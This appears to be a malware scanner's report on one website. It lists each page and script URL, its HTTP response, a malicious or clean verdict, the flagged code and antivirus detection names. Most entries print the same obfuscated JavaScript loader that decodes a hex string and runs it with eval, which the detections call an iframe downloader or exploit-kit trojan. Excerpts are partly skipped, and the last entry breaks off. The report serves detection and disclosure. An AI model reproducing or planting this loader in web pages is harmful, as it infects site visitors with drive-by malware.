Request | Server response | Status |
http://vatchik.com/ | 200 OK Content-Length: 7902 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sczi=String;vmzh="spl" "i" "t";nwnjk=window;lzo=(1)?"0x":"123";fuu=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b" "ody"])}catch(hiy){zquu=false;try{}catch(qfan){zquu=21;}if(1){rfe="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq65Zq68Zq61Zq
... 3000 bytes are skipped ...q5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[vmzh]("Zq");}nwnjk=rfe;gqxi=[];for(dwmu=22-20-2;-dwmu 1426!=0;dwmu =1){ifdvv=dwmu;if((0x19==031))gqxi =sczi.fromCharCode(eval(lzo nwnjk[1*ifdvv]) 0xa-fuu);}pkzkbj=eval;if(Math.ceil(5.5)===6)pkzkbj(gqxi)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://vatchik.com/fixit.js | 200 OK Content-Length: 6416 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) theObjects = document.getElementsByTagName("object"); for (var i = 0; i < theObjects.length; i ) { theObjects[i].outerHTML = theObjects[i].outerHTML; } sczi=String;vmzh="spl" "i" "t";nwnjk=window;lzo=(1)?"0x":"123";fuu=(5-3-1);try
... 3018 bytes are skipped ...q5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[vmzh]("Zq");}nwnjk=rfe;gqxi=[];for(dwmu=22-20-2;-dwmu 1426!=0;dwmu =1){ifdvv=dwmu;if((0x19==031))gqxi =sczi.fromCharCode(eval(lzo nwnjk[1*ifdvv]) 0xa-fuu);}pkzkbj=eval;if(Math.ceil(5.5)===6)pkzkbj(gqxi)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- Rising
- Trojan.Script.JS.Quidvetis.a
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://vatchik.com/home.htm | 200 OK Content-Length: 13114 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sczi=String;vmzh="spl" "i" "t";nwnjk=window;lzo=(1)?"0x":"123";fuu=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b" "ody"])}catch(hiy){zquu=false;try{}catch(qfan){zquu=21;}if(1){rfe="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq65Zq68Zq61Zq
... 3000 bytes are skipped ...q5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[vmzh]("Zq");}nwnjk=rfe;gqxi=[];for(dwmu=22-20-2;-dwmu 1426!=0;dwmu =1){ifdvv=dwmu;if((0x19==031))gqxi =sczi.fromCharCode(eval(lzo nwnjk[1*ifdvv]) 0xa-fuu);}pkzkbj=eval;if(Math.ceil(5.5)===6)pkzkbj(gqxi)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://vatchik.com/music.htm | 200 OK Content-Length: 12125 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sczi=String;vmzh="spl" "i" "t";nwnjk=window;lzo=(1)?"0x":"123";fuu=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b" "ody"])}catch(hiy){zquu=false;try{}catch(qfan){zquu=21;}if(1){rfe="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq65Zq68Zq61Zq
... 3000 bytes are skipped ...q5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[vmzh]("Zq");}nwnjk=rfe;gqxi=[];for(dwmu=22-20-2;-dwmu 1426!=0;dwmu =1){ifdvv=dwmu;if((0x19==031))gqxi =sczi.fromCharCode(eval(lzo nwnjk[1*ifdvv]) 0xa-fuu);}pkzkbj=eval;if(Math.ceil(5.5)===6)pkzkbj(gqxi)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://vatchik.com/gallery.htm | 200 OK Content-Length: 12065 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sczi=String;vmzh="spl"+"i"+"t";nwnjk=window;lzo=(1)?"0x":"123";fuu=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(hiy){zquu=false;try{}catch(qfan){zquu=21;}if(1){rfe="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq65Zq68Zq61Zq
... 3000 bytes are skipped ...q5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[vmzh]("Zq");}nwnjk=rfe;gqxi=[];for(dwmu=22-20-2;-dwmu+1426!=0;dwmu+=1){ifdvv=dwmu;if((0x19==031))gqxi+=sczi.fromCharCode(eval(lzo+nwnjk[1*ifdvv])+0xa-fuu);}pkzkbj=eval;if(Math.ceil(5.5)===6)pkzkbj(gqxi)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://vatchik.com/contact.htm | 200 OK Content-Length: 12869 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sczi=String;vmzh="spl" "i" "t";nwnjk=window;lzo=(1)?"0x":"123";fuu=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b" "ody"])}catch(hiy){zquu=false;try{}catch(qfan){zquu=21;}if(1){rfe="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq65Zq68Zq61Zq
... 3000 bytes are skipped ...q5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[vmzh]("Zq");}nwnjk=rfe;gqxi=[];for(dwmu=22-20-2;-dwmu 1426!=0;dwmu =1){ifdvv=dwmu;if((0x19==031))gqxi =sczi.fromCharCode(eval(lzo nwnjk[1*ifdvv]) 0xa-fuu);}pkzkbj=eval;if(Math.ceil(5.5)===6)pkzkbj(gqxi)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://vatchik.com/test404page.js | 404 Not Found Content-Length: 392 Content-Type: text/html | clean |
http://vatchik.com/album.htm | 200 OK Content-Length: 12774 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sczi=String;vmzh="spl" "i" "t";nwnjk=window;lzo=(1)?"0x":"123";fuu=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b" "ody"])}catch(hiy){zquu=false;try{}catch(qfan){zquu=21;}if(1){rfe="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq65Zq68Zq61Zq
... 3000 bytes are skipped ...q5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[vmzh]("Zq");}nwnjk=rfe;gqxi=[];for(dwmu=22-20-2;-dwmu 1426!=0;dwmu =1){ifdvv=dwmu;if((0x19==031))gqxi =sczi.fromCharCode(eval(lzo nwnjk[1*ifdvv]) 0xa-fuu);}pkzkbj=eval;if(Math.ceil(5.5)===6)pkzkbj(gqxi)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://vatchik.com/ufo.js | 200 OK Content-Length: 17265 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var UFO = { req: ["movie", "width", "height", "majorversion", "build"], opt: ["play", "loop", "menu", "quality", "scale", "salign", "wmode", "bgcolor", "base", "flashvars", "devicefont", "allowscriptaccess", "seamlesstabbing"], optAtt: ["id", "name", "align"], optExc: ["swliveconnect"], ximovie: "ufo.swf", xiwidth: "215", xiheight: "138", ua: navigator.userAgent.toLowerCase(), pluginType: "", fv: [0,0], foList: [], create: functi
... 3253 bytes are skipped ...q5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[vmzh]("Zq");}nwnjk=rfe;gqxi=[];for(dwmu=22-20-2;-dwmu 1426!=0;dwmu =1){ifdvv=dwmu;if((0x19==031))gqxi =sczi.fromCharCode(eval(lzo nwnjk[1*ifdvv]) 0xa-fuu);}pkzkbj=eval;if(Math.ceil(5.5)===6)pkzkbj(gqxi)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- Rising
- Trojan.Script.JS.Quidvetis.a
- nProtect
- JS:Trojan.JS.Iframe.DL
- Comodo
- TrojWare.JS.Kryptik.xt
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- ESET-NOD32
- JS/Kryptik.AOW
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://vatchik.com/album_choice.htm | 200 OK Content-Length: 19090 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sczi=String;vmzh="spl" "i" "t";nwnjk=window;lzo=(1)?"0x":"123";fuu=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b" "ody"])}catch(hiy){zquu=false;try{}catch(qfan){zquu=21;}if(1){rfe="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq65Zq68Zq61Zq
... 3000 bytes are skipped ...q5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[vmzh]("Zq");}nwnjk=rfe;gqxi=[];for(dwmu=22-20-2;-dwmu 1426!=0;dwmu =1){ifdvv=dwmu;if((0x19==031))gqxi =sczi.fromCharCode(eval(lzo nwnjk[1*ifdvv]) 0xa-fuu);}pkzkbj=eval;if(Math.ceil(5.5)===6)pkzkbj(gqxi)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://vatchik.com/leyla.htm | 200 OK Content-Length: 12800 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sczi=String;vmzh="spl" "i" "t";nwnjk=window;lzo=(1)?"0x":"123";fuu=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b" "ody"])}catch(hiy){zquu=false;try{}catch(qfan){zquu=21;}if(1){rfe="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq65Zq68Zq61Zq
... 3000 bytes are skipped ...q5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[vmzh]("Zq");}nwnjk=rfe;gqxi=[];for(dwmu=22-20-2;-dwmu 1426!=0;dwmu =1){ifdvv=dwmu;if((0x19==031))gqxi =sczi.fromCharCode(eval(lzo nwnjk[1*ifdvv]) 0xa-fuu);}pkzkbj=eval;if(Math.ceil(5.5)===6)pkzkbj(gqxi)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://vatchik.com/album2_choice.htm | 200 OK Content-Length: 19051 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sczi=String;vmzh="spl" "i" "t";nwnjk=window;lzo=(1)?"0x":"123";fuu=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b" "ody"])}catch(hiy){zquu=false;try{}catch(qfan){zquu=21;}if(1){rfe="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq65Zq68Zq61Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq65Zq68Zq61Zq
